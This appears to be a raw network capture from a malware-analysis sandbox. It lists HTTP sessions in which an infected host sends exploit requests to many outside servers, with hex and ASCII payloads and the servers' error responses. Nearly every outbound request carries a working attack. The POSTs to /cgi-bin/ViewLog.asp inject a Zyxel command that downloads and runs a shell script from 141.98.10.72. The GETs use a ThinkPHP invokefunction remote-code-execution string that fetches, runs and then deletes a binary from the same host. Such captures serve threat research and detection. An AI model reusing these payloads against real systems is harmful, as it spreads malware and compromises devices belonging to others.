                                                        Content-Type: text/html
                                                        Content-Length: 108
                                                        Connection: keep-alive
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                        Data Ascii: <!DOCTYPE HTML><html><head><title>400 Bad Request</title></head><body><h1>400 Bad Request</h1></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1363192.168.2.145449494.120.5.518080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:36:04.436146975 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1364192.168.2.143438031.200.71.1868080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:36:04.438183069 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1365192.168.2.145282894.123.109.568080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:36:04.438288927 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1366192.168.2.143915495.86.118.15680
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:36:04.557688951 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1367192.168.2.144273295.56.222.18280
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:36:04.592418909 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:36:04.882261038 CET29INHTTP/1.1 200 OK
                                                        Feb 14, 2024 09:36:04.882366896 CET515INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68
                                                        Data Ascii: Connection: closePragma: no-cacheCache-Control: no-cacheContent-Type: text/html; charset=utf-8<!DOCTYPE html PUBLIC "-//W3C//Dtd XHTML 1.0 Strict//EN" "http://www.w3.org/tr/xhtml1/Dtd/xhtml1-Transitional.dtd"><html xmlns="http://www


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1368192.168.2.143925631.216.105.878080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:36:04.956576109 CET268INHTTP/1.0 400 Bad Request
                                                        Server: Streamd,60E32754942F
                                                        Date: Wed, 14 Feb 2024 08:36:03 UTC
                                                        Content-Type: text/html
                                                        Content-Length: 108
                                                        Connection: close
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                        Data Ascii: <!DOCTYPE HTML><html><head><title>400 Bad Request</title></head><body><h1>400 Bad Request</h1></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1369192.168.2.146058495.111.210.4680
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:36:06.105484962 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:36:06.318219900 CET315INHTTP/1.1 400 Bad Request
                                                        Server: openresty
                                                        Date: Wed, 14 Feb 2024 08:36:03 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 154
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1370192.168.2.144763295.111.61.10580
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:36:06.120024920 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:36:06.347490072 CET501INHTTP/1.1 400 Bad Request
                                                        Date: Wed, 14 Feb 2024 08:36:07 GMT
                                                        Server: Apache/2.4.56 (Debian)
                                                        Content-Length: 307
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 63 32 68 35 6f 68 2e 62 61 72 73 79 2e 62 67 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.56 (Debian) Server at c2h5oh.barsy.bg Port 80</address></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1371192.168.2.145400295.101.104.14580
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:36:06.121860981 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:36:06.351392031 CET479INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 257
                                                        Expires: Wed, 14 Feb 2024 08:36:06 GMT
                                                        Date: Wed, 14 Feb 2024 08:36:06 GMT
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 61 37 38 31 30 30 32 26 23 34 36 3b 31 37 30 37 38 39 39 37 36 36 26 23 34 36 3b 35 37 61 62 30 65 38 32 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;a781002&#46;1707899766&#46;57ab0e82</BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1372192.168.2.145647895.0.219.20180
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:36:06.143196106 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1373192.168.2.143659295.142.160.23580
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:36:06.302550077 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:36:06.500991106 CET506INHTTP/1.1 400 Bad Request
                                                        Date: Wed, 14 Feb 2024 08:36:06 GMT
                                                        Server: Apache/2.4.38 (Debian)
                                                        Content-Length: 312
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 33 38 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 73 76 6e 74 72 61 63 6b 69 6e 67 2e 73 63 2d 32 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.38 (Debian) Server at svntracking.sc-2.com Port 80</address></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1374192.168.2.144871295.101.27.5480
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:36:06.306123018 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:36:06.506916046 CET479INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 257
                                                        Expires: Wed, 14 Feb 2024 08:36:06 GMT
                                                        Date: Wed, 14 Feb 2024 08:36:06 GMT
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 62 36 36 62 37 62 35 63 26 23 34 36 3b 31 37 30 37 38 39 39 37 36 36 26 23 34 36 3b 38 38 64 32 31 39 36 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;b66b7b5c&#46;1707899766&#46;88d2196</BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1375192.168.2.145849295.110.130.1880
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:36:06.338887930 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:36:06.559545994 CET490INHTTP/1.1 400 Bad Request
                                                        Content-Type: text/html; charset=us-ascii
                                                        Server: Microsoft-HTTPAPI/2.0
                                                        Date: Wed, 14 Feb 2024 08:36:06 GMT
                                                        Connection: close
                                                        Content-Length: 311
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1376192.168.2.145731895.216.146.1380
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:36:06.341604948 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:36:06.563729048 CET355INHTTP/1.1 400 Bad Request
                                                        Server: nginx/1.14.0 (Ubuntu)
                                                        Date: Wed, 14 Feb 2024 08:36:06 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 182
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1377192.168.2.144864095.64.189.20680
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:36:06.362170935 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:36:06.602325916 CET333INHTTP/1.1 400 Bad Request
                                                        Server: Web server
                                                        Date: Wed, 14 Feb 2024 08:36:05 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 171
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 57 65 62 20 73 65 72 76 65 72 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>Web server</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1378192.168.2.143585295.31.211.8480
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:36:06.391745090 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:36:06.640625000 CET336INHTTP/1.1 400 Bad Request
                                                        Server: nginx/1.20.1
                                                        Date: Wed, 14 Feb 2024 08:36:06 GMT
                                                        Content-Type: text/html; charset=utf-8
                                                        Content-Length: 157
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.20.1</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1379192.168.2.143390694.102.63.728080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:36:06.929780960 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1380192.168.2.143790695.214.144.1778080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:36:06.929836035 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1381192.168.2.143679095.110.163.1108080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:36:06.936197042 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
